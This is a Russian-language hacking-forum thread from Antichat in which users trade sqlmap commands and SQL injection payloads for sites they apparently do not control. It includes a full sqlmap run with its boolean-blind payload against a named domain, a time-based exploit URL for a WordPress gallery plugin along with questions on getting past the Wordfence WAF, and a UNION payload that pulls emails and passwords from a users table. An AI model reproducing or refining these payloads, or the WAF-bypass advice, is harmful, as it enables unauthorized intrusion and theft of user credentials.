ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Люди добрые ,подскажите ввожу

sqlmap -u "https://www.domen.mx/top/?key=xol" --random-agent --tamper=space2comment --risk=3 --level=1 --threads=10 --dbs

получаю, имя бд

available databases [1]:
[*] bd_upgrade_live

далее ввожу

sqlmap -u "https://www.domen.mx/top/?key=xol" --random-agent --tamper=space2comment --threads=10 -D suplemen_upgrade_live -tables

таблица не выводит,пишет

[08:12:55] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: key (GET)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: key=xol' AND 3094=3094 AND 'NPlU'='NPlU

---

[08:12:55] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[08:12:55] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL 5

[08:12:55] [INFO] fetching tables for database: 'suplemen_upgrade_live'

[08:12:55] [INFO] fetching number of tables for database 'suplemen_upgrade_live'

[08:13:01] [INFO] retrieved:

[08:13:02] [WARNING] unexpected HTTP code '403' detected. Will use (extra) validation step in similar cases

[08:13:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'

[08:13:03] [WARNING] unable to retrieve the number of tables for database 'bd_upgrade_live'

[08:13:03] [ERROR] unable to retrieve the table names for any database

do you want to use common table existence check? [y/N/q] n

No tables found

[08:14:27] [WARNING] HTTP error codes detected during run:

403 (Forbidden) - 3 times

[08:14:27] [INFO] fetched data logged to text files under '/home/win/.sqlmap/output/www.domen.mx'
[*] ending @ 08:14:27 /2020-02-06/

Обьясните пожалуйста почему так?

Ну все логично, срабатывает какойто ваф, пробуйте крутить руками и смотреть на что срабатывает, и далее подбирайте/пишите нужный тампер

Скажите пожалуйста. Как правильно в GET запросе задать параметр мапу? Я задаю -p "параметр" а он по своему идёт

не может быть. Попробуйте поставить *

Ребят. Каким темпером можно обойти WAF Wordfence. Cайт как поняли на WordPress. Нашел уязвимый плагин. Под страницу входа в POST запросе есть скуля. Есть експлойт готовый http://localhost/wp-admin/admin.php?page=unitegallery&view=preview&id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))rock)

Но в браузере пишет

403 Forbidden

A potentially unsafe operation has been detected in your request to this site

Как обойти этот WAF мапом?

Пробую verbose -v3. 403 ошибка везде. Как этот експлойт мапу скормить?

Ты спрашиваешь про одно, а в лугах (то что ты кинул) совсем другое. По поводу тамперов трудно сказать, надо руками тестить. Лучше руками крутить.

У меня знаний в SQL нет, чтобы руками крутить. С мапом немного проще. Но также не знаю как с ним работать полностью. Ман бы на русском толковый как руками крутить

В хроме переводчик есть а ещё есть поиск по форуму

может кто то помочь , привести в виду DIOSa ?

5 UNION ALL SELECT NULL,NULL,(SELECT CONCAT(0x71626a6a71,IFNULL(CAST(email AS NCHAR),0x20),0x687971737978,IFNULL(CAST(password AS NCHAR),0x20),0x716b716b71) FROM base.users LIMIT 3,

,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL ,NUL

NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL-- uBIi

хотя тут юнион , но при этом выводит 1 запись оч долго